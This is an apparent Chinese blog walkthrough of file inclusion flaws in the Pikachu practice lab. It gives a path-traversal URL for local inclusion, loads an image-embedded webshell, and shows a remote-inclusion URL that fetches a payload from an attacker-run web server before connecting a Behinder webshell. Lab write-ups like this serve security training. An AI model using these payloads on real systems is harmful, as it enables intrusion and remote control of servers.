pikachu 文件包含漏洞

pikachu 文件包含漏洞

1 本地包含

http://192.168.52.143/pikachu/vul/fileinclude/fi_local.php?
filename=…/…/…/…/1.php&submit=提交查询
在这里插入图片描述

加载图片马
http://192.168.52.143/pikachu/vul/fileinclude/fi_local.php?filename=…/…/…/…/007.txt&submit=提交查询在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

2 远程包含

放在服务器上
在这里插入图片描述
开启php.ini的allow_url_include

在这里插入图片描述
服务器起一个web服务

在这里插入图片描述
在这里插入图片描述
成功包含
http://192.168.8.105/pikachu/vul/fileinclude/fi_remote.php?filename=http://...:9999/123.txt&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
在这里插入图片描述
上冰蝎
在这里插入图片描述
在这里插入图片描述

3 怎么挖这种漏洞

实际中没遇到过,得代码审计,include(),include_once()
require(),require_once()

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值